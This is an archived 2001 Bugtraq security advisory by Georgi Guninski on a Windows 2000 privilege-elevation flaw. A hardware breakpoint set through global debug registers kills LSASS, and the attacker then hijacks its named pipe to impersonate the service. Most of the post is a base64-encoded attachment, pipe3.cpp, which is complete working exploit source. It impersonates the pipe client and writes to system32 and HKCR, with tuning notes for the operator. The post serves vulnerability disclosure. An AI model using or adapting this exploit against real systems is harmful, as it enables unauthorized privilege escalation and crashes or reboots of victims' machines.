[20752] in bugtraq
Elevation of privileges with debug registers on Win2K
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Thu May 24 12:56:00 2001
Message-ID: <3B0D0B96.39E2B92A@guninski.com>
Date: Thu, 24 May 2001 16:24:38 +0300
From: Georgi Guninski <guninski@guninski.com>
MIME-Version: 1.0
To: Bugtraq <BUGTRAQ@securityfocus.com>
Content-Type: multipart/mixed;
boundary="------------39EBD334290CF57D972D346E"
This is a multi-part message in MIME format.
--------------39EBD334290CF57D972D346E
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Georgi Guninski security advisory #45, 2001
Elevation of privileges with debug registers on Win2K
Systems affected:
Win2K, Win2K SP1
have not tested on Win2K SP2 but according to Microsoft SP2 fixes this
Risk: High
Date: 24 May 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.
Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
If someone can execute programs on a target Win2K system then he may
elevate his privileges at least to extent which gives him write access
to C:\WINNT\SYSTEM32 and HKCR.
Details:
The problem is the x86 debug registers DR0-7 are global for all processes.
So setting a hardware breakpoint in one process affects other processes and
services. If the hardware breakpoint is hit in a service then an unhandled
single step exception occurs and the process/service is terminated.
After the service is terminated it is possible to hijack its trusted named
pipes and when another service writes to the named pipe it is possible to
impersonate the service.
In my exploit pipe3.cpp LSASS.EXE is killed with the help of hardware breakpoint
and then \\.\pipe\lsass is hijacked.
Simple test for debug registers: Start debugging CALC.EXE with windbg.
Set hardware breakpoint on memory write to the current value of ESP.
Start taskmgr.exe and wait some time.
If you start receiving Single Step exception with dialog boxes and/or BSOD
in processess other than CALC.EXE then there is vulnerability.
Notes on using pipe3.cpp:
pipe3.cpp is kind of ugly but works on all the boxes I have tested.
It has 2 arguments - <pid of LSASS.EXE> and <ESP in LSASS.EXE>.
Build and start pipe3. Wait some time. The expected result is to get
exception in LSASS.EXE and then it must be terminated. Then after sometime
the console is locked and the mashine is rebooted. A file is created in
c:\winnt\system32 and a key in HKCR.
If LSASS.EXE is not terminated stop and restart pipe3.
If nothing happens you may need to play with the parameter MAGICESPINLSA -
this is the ESP in a thread in LSASS.EXE.
If you get BSOD then you need more playing with the parameter and or Sleep().
Workaround: According to Microsoft SP2 fixes this though I have not verified it
personally.
Demonstration:
http://www.guninski.com/pipe3.cpp
Vendor status:
Microsoft was informed on 20 May 2001.
Regards,
Georgi Guninski
http://www.guninski.com
--------------39EBD334290CF57D972D346E
Content-Type: application/x-unknown-content-type-cppfile;
name="pipe3.cpp"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="pipe3.cpp"
Ly8gV2luMksgZWxldmF0aW9uIG9mIHByaXZpbGVnZXMNCi8vIFdyaXR0ZW4gYnkgR2Vvcmdp
IEd1bmluc2tpIGh0dHA6Ly93d3cuZ3VuaW5za2kuY29tDQovLyBLaW5kIG9mIHVnbHkgYnV0
IHdvcmtzDQovLyBDaGVjayB0aGUgZGlzY2xhaW1lciBhbmQgYWR2aXNvcnkgYXQgaHR0cDov
L3d3dy5ndW5pbnNraS5jb20vZHIwNy5odG1sDQoNCiNkZWZpbmUgX1dJTjMyX1dJTk5UICAw
eDA1MDANCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8d2luZG93cy5oPg0KI2lu
Y2x1ZGUgPHN0ZGxpYi5oPg0KDQovLyBtYXkgbmVlZCB0byBjaGFuZ2UgYmVsb3cNCi8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCkRXT1JEIGxzYXNzcGlkPTIyNDsgLy8gcGlk
IG9mIExTQVNTLkVYRQ0KLy9EV09SRCBsc2Fzc3BpZD0yMzY7IC8vIHBpZCBvZiBMU0FTUy5F
WEUNCkRXT1JEIE1BR0lDRVNQSU5MU0E9MHgwMDUzZmZhMDsgLy8gRVNQIGluIExTQVNTLkVY
RSAtIG1heSBuZWVkIHRvIGNoYW5nZSBpdA0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vDQoNCmNoYXIgc3pQaXBlWzY0XT0iXFxcXC5cXHBpcGVcXGxzYXNzIjsNCkhBTkRMRSBo
UHJvYyA9IE5VTEw7DQpQUk9DRVNTX0lORk9STUFUSU9OIHBpOw0KDQoNCnZvbGF0aWxlIGlu
dCBsc2FkaWVkID0gMDsNCg0KDQoNCnVuc2lnbmVkIGxvbmcgX19zdGRjYWxsIHRocmVhZGxv
Y2sodm9pZCAqdikNCnsgICANCglTbGVlcCgxMDAwKTsNCglMb2NrV29ya1N0YXRpb24oKTsN
CglyZXR1cm4gMDsNCn0NCg0KdW5zaWduZWQgbG9uZyBfX3N0ZGNhbGwgdGhyZWFkd3JpdGVy
KHZvaWQgKnYpDQp7DQoJd2hpbGUoIWxzYWRpZWQpDQoJew0KICAgIEZJTEUgKmYxOw0KCWYx
PWZvcGVuKCJcXFxcLlxccGlwZVxcbHNhc3MiLCJhIik7DQoJIGlmIChmMSAhPSBOVUxMKQ0K
CQl7DQoJCSBmcHJpbnRmKGYxLCJBIik7DQoJCSBmY2xvc2UoZjEpOw0KCQl9DQovKg0KCSBl
bHNlDQoJCSBwcmludGYoIiVzXG4iLCJlcnJvciB3cml0aW5nIHRvIHBpcGUiKTsNCiovDQoJ
U2xlZXAoNDAwKTsNCgl9DQoJcHJpbnRmKCIlc1xuIiwiU3RvcCB3cml0aW5nIHRvIHBpcGUi
KTsNCglyZXR1cm4gMDsNCn0NCg0KdW5zaWduZWQgbG9uZyBfX3N0ZGNhbGwgd2FpdGxzYWRp
ZSh2b2lkICp2KQ0Kew0KDQppbnQgbHNhZGllZDI9MDsNCmxvbmcgKCBfX3N0ZGNhbGwgKk50
UXVlcnlTeXN0ZW1JbmZvcm1hdGlvbiApKCBVTE9ORywgUFZPSUQsIFVMT05HLCBVTE9ORyAp
ID0gTlVMTDsNCmlmICggIU50UXVlcnlTeXN0ZW1JbmZvcm1hdGlvbiApDQogICAgICBOdFF1
ZXJ5U3lzdGVtSW5mb3JtYXRpb24gPSAoIGxvbmcgKCBfX3N0ZGNhbGwgKiApKCBVTE9ORywg
UFZPSUQsIFVMT05HLA0KVUxPTkcgKSApIEdldFByb2NBZGRyZXNzKCBHZXRNb2R1bGVIYW5k
bGUoICJudGRsbC5kbGwiICksIk50UXVlcnlTeXN0ZW1JbmZvcm1hdGlvbiIgKTsNCnR5cGVk
ZWYgc3RydWN0IF90YWdUaHJlYWRJbmZvDQp7DQogICAgICAgIEZJTEVUSU1FIGZ0Q3JlYXRp
b25UaW1lOw0KICAgICAgICBEV09SRCBkd1Vua25vd24xOw0KICAgICAgICBEV09SRCBkd1N0
YXJ0QWRkcmVzczsNCiAgICAgICAgRFdPUkQgZHdPd25pbmdQSUQ7DQogICAgICAgIERXT1JE
IGR3VGhyZWFkSUQ7DQogICAgICAgIERXT1JEIGR3Q3VycmVudFByaW9yaXR5Ow0KICAgICAg
ICBEV09SRCBkd0Jhc2VQcmlvcml0eTsNCiAgICAgICAgRFdPUkQgZHdDb250ZXh0U3dpdGNo
ZXM7DQogICAgICAgIERXT1JEIGR3VGhyZWFkU3RhdGU7DQogICAgICAgICAgRFdPUkQgZHdX
YWl0UmVhc29uOw0KICAgICAgICBEV09SRCBkd1Vua25vd24yWyA1IF07DQp9IFRIUkVBRElO
Rk8sICpQVEhSRUFESU5GTzsNCiNwcmFnbWEgd2FybmluZyggZGlzYWJsZTo0MjAwICkNCnR5
cGVkZWYgc3RydWN0IF90YWdQcm9jZXNzSW5mbw0Kew0KICAgICAgICBEV09SRCBkd09mZnNl
dDsNCiAgICAgICAgRFdPUkQgZHdUaHJlYWRDb3VudDsNCiAgICAgICAgRFdPUkQgZHdVbmtu
b3duMVsgNiBdOw0KICAgICAgICBGSUxFVElNRSBmdENyZWF0aW9uVGltZTsNCiAgICAgICAg
RFdPUkQgZHdVbmtub3duMlsgNSBdOw0KICAgICAgICBXQ0hBUiogcHN6UHJvY2Vzc05hbWU7
DQogICAgICAgIERXT1JEIGR3QmFzZVByaW9yaXR5Ow0KICAgICAgICBEV09SRCBkd1Byb2Nl
c3NJRDsNCiAgICAgICAgRFdPUkQgZHdQYXJlbnRQcm9jZXNzSUQ7DQogICAgICAgIERXT1JE
IGR3SGFuZGxlQ291bnQ7DQogICAgICAgIERXT1JEIGR3VW5rbm93bjM7DQogICAgICAgIERX
T1JEIGR3VW5rbm93bjQ7DQogICAgICAgIERXT1JEIGR3VmlydHVhbEJ5dGVzUGVhazsNCiAg
ICAgICAgRFdPUkQgZHdWaXJ0dWFsQnl0ZXM7DQogICAgICAgIERXT1JEIGR3UGFnZUZhdWx0
czsNCiAgICAgICAgRFdPUkQgZHdXb3JraW5nU2V0UGVhazsNCiAgICAgICAgRFdPUkQgZHdX
b3JraW5nU2V0Ow0KICAgICAgICBEV09SRCBkd1Vua25vd241Ow0KICAgICAgICBEV09SRCBk
d1BhZ2VkUG9vbDsNCiAgICAgICAgRFdPUkQgZHdVbmtub3duNjsNCiAgICAgICAgRFdPUkQg
ZHdOb25QYWdlZFBvb2w7DQogICAgICAgIERXT1JEIGR3UGFnZUZpbGVCeXRlc1BlYWs7DQog
ICAgICAgIERXT1JEIGR3UHJpdmF0ZUJ5dGVzOw0KICAgICAgICBEV09SRCBkd1BhZ2VGaWxl
Qnl0ZXM7DQogICAgICAgIERXT1JEIGR3VW5rbm93bjdbIDQgXTsNCiAgICAgICAgVEhSRUFE
SU5GTyB0aVsgMCBdOw0KfSBfUFJPQ0VTU0lORk8sICpQUFJPQ0VTU0lORk87DQojcHJhZ21h
IHdhcm5pbmcoIGRlZmF1bHQ6NDIwMCApDQoNCg0KDQogUEJZVEUgcGJ5SW5mbyA9IE5VTEw7
DQogRFdPUkQgY0luZm9TaXplID0gMHgyMDAwMDsNCndoaWxlKCFsc2FkaWVkMikNCnsNCiBw
YnlJbmZvID0gKCBQQllURSApIG1hbGxvYyggY0luZm9TaXplICk7DQogTnRRdWVyeVN5c3Rl
bUluZm9ybWF0aW9uKCA1LCBwYnlJbmZvLCBjSW5mb1NpemUsIDAgKSA7DQogUFBST0NFU1NJ
TkZPIHBQcm9jZXNzSW5mbyA9ICggUFBST0NFU1NJTkZPICkgcGJ5SW5mbzsNCiBib29sIGJM
YXN0ID0gZmFsc2U7DQogbHNhZGllZDIgPSAxOw0KIGRvIHsNCgkgaWYgKCBwUHJvY2Vzc0lu
Zm8tPmR3T2Zmc2V0ID09IDAgKQ0KICAgICAgICAgYkxhc3QgPSB0cnVlOw0KICAgICBpZiAo
cFByb2Nlc3NJbmZvLT5kd1Byb2Nlc3NJRCA9PSBsc2Fzc3BpZCkNCgkJIGxzYWRpZWQyID0g
MCA7DQogICAgIHBQcm9jZXNzSW5mbyA9ICggUFBST0NFU1NJTkZPICkgKCAoIFBCWVRFICkg
cFByb2Nlc3NJbmZvICsgcFByb2Nlc3NJbmZvLT5kd09mZnNldCApOw0KICAgIH0gd2hpbGUo
IGJMYXN0ID09IGZhbHNlICk7DQogZnJlZSggcGJ5SW5mbyApOw0KfQ0KcHJpbnRmKCJMU0Eg
ZGllZCFcbiIpOw0KbHNhZGllZD0xOw0KcmV0dXJuIDA7DQp9DQoNCg0KDQp2b2lkIGFkZF90
aHJlYWQoSEFORExFIHRocmVhZCkNCnsNCgkJICBDT05URVhUIGN0eCA9IHtDT05URVhUX0RF
QlVHX1JFR0lTVEVSU307DQoNCi8vRFI3PWQwMDAwNTQwIERSNj1mZmZmMGZmMCBEUjM9NTNm
ZmEwIERSMj0wIERSMT0wIERSMD0wDQoNCiAgICBTdXNwZW5kVGhyZWFkKHRocmVhZCk7DQog
ICAgR2V0VGhyZWFkQ29udGV4dCh0aHJlYWQsJmN0eCk7DQoJY3R4LkRyNz0weGQwMDAwNTQw
Ow0KCWN0eC5EcjY9MHhmZmZmMGZmMDsNCgljdHguRHIzPU1BR0lDRVNQSU5MU0E7DQoJY3R4
LkRyMj0wOw0KCWN0eC5EcjE9MDsNCgljdHguRHIwPTA7DQogICAgU2V0VGhyZWFkQ29udGV4
dCh0aHJlYWQsICZjdHgpOw0KICAgIFJlc3VtZVRocmVhZCh0aHJlYWQpOw0KLy8gICAgcHJp
bnRmKCJEUjc9JXggRFI2PSV4IERSMz0leCBEUjI9JXggRFIxPSV4IERSMD0leFxuIixjdHgu
RHI3LGN0eC5EcjYsY3R4LkRyMyxjdHguRHIyLGN0eC5EcjEsY3R4LkRyMCk7DQoNCn0NCg0K
DQp1bnNpZ25lZCBsb25nIF9fc3RkY2FsbCB0aHJlYWRkZWIodm9pZCAqdikNCnsNCiAgICBT
VEFSVFVQSU5GTyBzaSA9IHsNCiAgICAgICAgc2l6ZW9mKFNUQVJUVVBJTkZPKQ0KICAgIH07
DQoNCg0KICAgIENyZWF0ZVByb2Nlc3MoMCwiYzpcXHdpbm50XFxzeXN0ZW0zMlxcdGFza21n
ci5leGUiLDAsMCwwLA0KCQlDUkVBVEVfTkVXX0NPTlNPTEUsMCwwLCZzaSwmcGkpOw0KCVNs
ZWVwKDIwMDApOw0KICAgIEJPT0wgc3RhdHVzID0gQ3JlYXRlUHJvY2VzcygNCiAgICAgICAg
MCwNCiAgICAgICAgImM6XFx3aW5udFxcc3lzdGVtMzJcXGNhbGMuZXhlIiwNCiAgICAgICAg
MCwwLDAsDQoJCURFQlVHX1BST0NFU1MNCiAgICAgICAgfCBERUJVR19PTkxZX1RISVNfUFJP
Q0VTUw0KICAgICAgICB8IENSRUFURV9ORVdfQ09OU09MRSwNCiAgICAgICAgMCwwLCZzaSwm
cGkpOw0KDQogICAgaWYoICFzdGF0dXMgKQ0KICAgIHsNCgkJcHJpbnRmKCIlc1xuIiwiZXJy
b3IgZGVidWdnaW5nIik7DQoJCWV4aXQoMSk7DQogICAgfQ0KDQogICAgYWRkX3RocmVhZChw
aS5oVGhyZWFkKTsNCg0KICAgIGZvciggOzsgKQ0KICAgIHsNCiAgICAgICAgREVCVUdfRVZF
TlQgZGU7DQogICAgICAgIGlmKCAhV2FpdEZvckRlYnVnRXZlbnQoJmRlLCBJTkZJTklURSkg
KQ0KICAgICAgICB7DQoJCSBwcmludGYoIiVzXG4iLCJlcnJvciBXYWl0Rm9yRGVidWdFdmVu
dCIpOw0KICAgICAgICB9DQoNCiAgICAgICAgc3dpdGNoKCBkZS5kd0RlYnVnRXZlbnRDb2Rl
ICkNCiAgICAgICAgew0KICAgICAgICBjYXNlIENSRUFURV9USFJFQURfREVCVUdfRVZFTlQ6
DQogICAgICAgICAgICBhZGRfdGhyZWFkKGRlLnUuQ3JlYXRlVGhyZWFkLmhUaHJlYWQpOw0K
ICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICBDb250aW51ZURlYnVnRXZlbnQo
ZGUuZHdQcm9jZXNzSWQsZGUuZHdUaHJlYWRJZCxEQkdfQ09OVElOVUUpOw0KCX0NCg0KCXJl
dHVybiAwOw0KfQ0KDQogICAgaW50IG1haW4oaW50IGFyZ2MsY2hhciogYXJndltdKQ0KICAg
IHsNCiAgICAgIERXT1JEIGR3VHlwZSA9IFJFR19EV09SRDsNCiAgICAgIERXT1JEIGR3U2l6
ZSA9IHNpemVvZihEV09SRCk7DQoJICBEV09SRCBkd051bWJlciA9IDA7DQogICAgICBjaGFy
IHN6VXNlclsyNTZdOw0KICAgICAgSEFORExFIGhQaXBlID0gMDsNCg0KCQlpZiAoYXJnYyA+
IDEpDQoJCQlsc2Fzc3BpZD1hdG9pKGFyZ3ZbMV0pOw0KCQlpZiAoYXJnYyA+IDIpDQoJCQlz
c2NhbmYoYXJndlsyXSwiJXgiLCZNQUdJQ0VTUElOTFNBKTsNCg0KCSAgcHJpbnRmKCJGdW4g
d2l0aCBkZWJ1ZyByZWdpc3RlcnMuIFdyaXR0ZW4gYnkgR2VvcmdpIEd1bmluc2tpXG4iKTsN
CgkgIHByaW50ZigidnZkciBzdGFydGVkOiBsc2Fzc3BpZD0lZCBicmVha3A9JXhcbiIsbHNh
c3NwaWQsTUFHSUNFU1BJTkxTQSk7DQogICAJICBDcmVhdGVUaHJlYWQoMCwgMCwgJnRocmVh
ZHdyaXRlciwgTlVMTCwgMCwgMCk7DQoJICBDcmVhdGVUaHJlYWQoMCwgMCwgJndhaXRsc2Fk
aWUsIE5VTEwsIDAsIDApOw0KCSAgQ3JlYXRlVGhyZWFkKDAsIDAsICZ0aHJlYWRkZWIsIE5V
TEwsIDAsIDApOw0KDQogIAkgIHdoaWxlKCFsc2FkaWVkKTsNCg0KICAgICAgcHJpbnRmKCJz
dGFydCAlc1xuIixzelBpcGUpOw0KICAgICAgaFBpcGUgPSBDcmVhdGVOYW1lZFBpcGUgKHN6
UGlwZSwgUElQRV9BQ0NFU1NfRFVQTEVYLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIFBJUEVfVFlQRV9NRVNTQUdFfFBJUEVfV0FJVCwNCiAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAyLCAwLCAwLCAwLCBOVUxMKTsNCiAgICAgIGlmIChoUGlwZSA9PSBJTlZB
TElEX0hBTkRMRV9WQUxVRSkNCiAgICAgIHsNCiAgICAgICAgcHJpbnRmICgiRmFpbGVkIHRv
IGNyZWF0ZSBuYW1lZCBwaXBlOlxuICAlc1xuIiwgc3pQaXBlKTsNCiAgICAgICAgcmV0dXJu
IDM7DQogICAgICB9DQoJICBDcmVhdGVUaHJlYWQoMCwgMCwgJnRocmVhZGxvY2ssIE5VTEws
IDAsIDApOw0KCSAgQ29ubmVjdE5hbWVkUGlwZSAoaFBpcGUsIE5VTEwpOw0KICAgICAgaWYg
KCFSZWFkRmlsZSAoaFBpcGUsICh2b2lkICopICZkd051bWJlciwgNCwgJmR3U2l6ZSwgTlVM
TCkpDQogICAgICB7DQogICAgICAgIHByaW50ZiAoIkZhaWxlZCB0byByZWFkIHRoZSBuYW1l
ZCBwaXBlLlxuIik7DQogICAgICAgIENsb3NlSGFuZGxlKGhQaXBlKTsNCiAgICAgICAgcmV0
dXJuIDQ7DQogICAgICB9DQoNCiAgICAgaWYgKCFJbXBlcnNvbmF0ZU5hbWVkUGlwZUNsaWVu
dCAoaFBpcGUpKQ0KICAgICAgew0KICAgICAgICBwcmludGYgKCJGYWlsZWQgdG8gaW1wZXJz
b25hdGUgdGhlIG5hbWVkIHBpcGUuXG4iKTsNCiAgICAgICAgQ2xvc2VIYW5kbGUoaFBpcGUp
Ow0KICAgICAgICByZXR1cm4gNTsNCiAgICAgIH0NCiAgICAgIGR3U2l6ZSAgPSAyNTY7DQog
ICAgICBHZXRVc2VyTmFtZShzelVzZXIsICZkd1NpemUpOw0KICAgICAgcHJpbnRmICgiSW1w
ZXJzb25hdGluZyBkdW1teSA6KSA6ICVzXG5cblxuXG4iLCBzelVzZXIpOw0KLy8gdGhlIGFj
dGlvbiBiZWdpbnMNCgkgIEZJTEUgKmYxOw0KCSAgZjE9Zm9wZW4oImM6XFx3aW5udFxcc3lz
dGVtMzJcXHZ2MS52diIsImEiKTsNCgkJaWYgKGYxICE9IE5VTEwpDQoJCXsNCgkJIGZwcmlu
dGYoZjEsImxzYXNzIHdvcmtlZFxuIik7DQoJCSBmY2xvc2UoZjEpOw0KCQkgcHJpbnRmKCJc
biVzXG4iLCJEb25lISIpOw0KCQl9DQoJCWVsc2UNCgkJIHByaW50ZigiZXJyb3IgY3JlYXRp
bmcgZmlsZSIpOw0KCWZmbHVzaChzdGRvdXQpOw0KCUhLRVkgbXlrZXk7DQoJUmVnQ3JlYXRl
S2V5KEhLRVlfQ0xBU1NFU19ST09ULCJ2diIsJm15a2V5KTsNCglSZWdDbG9zZUtleShteWtl
eSk7DQoNCg0KICAgIENsb3NlSGFuZGxlKGhQaXBlKTsNCiAgICByZXR1cm4gMDsNCiAgICB9
DQo=
--------------39EBD334290CF57D972D346E--
